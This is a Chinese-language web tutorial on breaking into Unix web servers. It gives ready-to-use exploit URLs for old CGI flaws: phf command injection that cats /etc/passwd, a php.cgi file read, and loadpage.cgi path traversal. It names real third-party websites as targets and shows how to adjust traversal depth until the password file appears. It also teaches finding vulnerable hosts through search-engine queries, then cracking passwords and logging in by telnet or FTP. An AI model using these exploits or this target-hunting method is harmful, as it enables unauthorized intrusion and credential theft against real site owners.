歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
您现在的位置: Linux教程網 >> UnixLinux >  >> Unix知識 >> Unix資訊

入侵Unix操作系統教程

當我們要入侵Unix操作系統的時候,你認為是什麼最最重要呢?根據我的經驗來說,我覺得是靈活利用資源。這是我的個人的觀點。那麼就來學習一下如何入侵Unix操作系統吧。

相信大家都知道那個著名的漏洞吧:phf

漏洞描述: 在NCSA 或者 Apache (1.1.1版本以內)非商業版本的Web Server中有一段程序util.c,允許黑客以root身份執行任何一個指令
http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

這是四年前的的漏洞了,我們現在還能找到他嗎?

答案是:當然可以!

大家找個軟件慢滿跑,小榕的亂刀還挺不錯的。 Unix操作系統中,還有很多的漏洞。這個漏洞可以直接遠程執行命令的哦,詳細情況大家看《一次80端口的入侵》這篇文章。

找到用戶密碼後,你也可以telent或者ftp上去看看哦。

要不干脆黑了它。 不過,我是不會干的。大家感到奇怪嗎?都什麼年代了,還有這個漏洞。我是怎麼找出來的呢?

名字:php.cgi 2.0beta10或更早版本

描述:包括緩存溢出漏洞,還有導致任何Unix操作系統文件可以被入侵者以nobody權限讀取的漏洞。

http://www.victim.com/cgi-bin/php.cgi?/etc/passwd php.cgi2.1版本的只能讀shtml文件了. 對於密碼文件,同志們要注意一下,也許可能在/etc/master.passwd/etc/security/passwd等.

這個漏洞大家也很熟悉吧,也很老了。 我們一樣可以找到有這個漏洞的主機。

http://hellas.me.ntou.edu.tw/cgi-bin/php.cgi?/etc/passwd
一個台灣的家伙。
http://www.pcsc.net/cgi-bin/php.cgi?/etc/passwd
不知道什麼網站。
http://www.ccchubu.co.jp/cgi-bin/php.cgi?/etc/passwd

這個php.cgi漏洞只能讀文件。 我們還是用亂刀來跑密碼吧。Unix操作系統找到用戶密碼後,你也可以telent或者ftp一下哦。 我又是怎麼找出來的呢?

名字:loadpage.cgi

描述:可以用來查看任意文件,首先用浏覽器找到當前路徑,
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ 這時可能會返回一個錯誤信息: Cannot open file /home/www/shop/XYZ

現在可以替換為下面的格式,
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../<路徑>/<文件名>

具體如下:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd

大家看看:
http://www.valueindia.com.au/cgi-bin/loadpage.cgi?user_id=&file=/../../../../../../../../etc/passwd

前幾天我還可以看到密碼檔的。 現在可能打上補丁了,或者刪掉了,要不就被防火牆過濾了。 我們來看看另一個。
http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd

嗯,為什麼是500錯誤? Unix操作系統漏洞手冊上是這樣的啊。

我們要靈活應用嘛,是路徑問題。

我們改成:http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../etc/passwd

Cannot open file /usr/local/etc/httpd/htdocs/bigfivestuff/store//../../etc/passwd ?

還是路徑問題。 我們的路徑不夠深入。當前目錄是在:/usr/local/etc/httpd/htdocs/bigfivestuff/store/
/../../etc/passwd只向上跳兩層。

也就是在/usr/local/etc/httpd/htdocs/

還有五層目錄。 我們就添加五層"../"

http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../etc/passwd

大家看到了嗎? 密碼檔 。不過是shadow了的。Unix操作系統中我們一樣可以用流光生成用戶列表然後FTP簡單探測。我來說說我是怎麼找到的吧。

我們進入http://www.google.com/ (一個很不錯的搜索引擎) 當然你也可以用http://www.yahoo.com 在輸入框裡我們輸入 /cgi-bin/phf 然後回車,我們會發現類似如下內容的頁面。

已向英特網搜索/cgi-bin/phf. 共約有7,320項查詢結果,這是第1-10項 。搜索用時0.08秒。

類別: Regional > North America > ... > DOE National Laboratories > Ames Laboratory

Untitled
lcweb.loc.gov/cgi-bin/phf/ - 類似網頁
Untitled
lcweb.loc.gov/cgi-bin/phf - 類似網頁
Ames Phone Book - People

類別: Regional > North America > ... > DOE National Laboratories >
Ames Laboratory
ph.iastate.edu/cgi-bin/phf - 類似網頁

這些網站都有/cgi-bin/phf

也就有可能他們的版本剛好是有上面的漏洞的那個,而沒有打補丁!

我們試試http://xxx.xxxxxxxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

不行就試試搜索/cgi-bin/php.cgi /cgi-bin/loadpage.cgi

當然你也可以試其他類似的漏洞。 互連網這麼大,總是能找到有的! 但我們這樣做太笨了點。畢竟這不是新漏洞,要找到一個能用的太難了。 Unix操作系統畢竟還是存在漏洞的。

但我們為什麼不想想? 如果新發現什麼漏洞可以直接讀取文件或者運行命令的,我們一樣可以用搜索引擎來找到有這個漏洞的主機啊。 為什麼三年前的漏洞我們還能看到呢? 就象每個人都不一樣,當然並不是每個網管都很負責的。:)

還有,如果你有什麼漏洞不懂,或者你要找什麼資料軟件等,也一樣可以利用搜索引擎來找!

比如,我們對twwwscan 的掃描結果:Frontpage98 Hole(_vti_inf.html) 不了解,我們就可以在搜索引擎裡輸入_vti_inf.html,你肯定可以找到很多相關的文章和資料的。

找到了漏洞,我們就可以入侵Unix操作系統了。

Copyright © Linux教程網 All Rights Reserved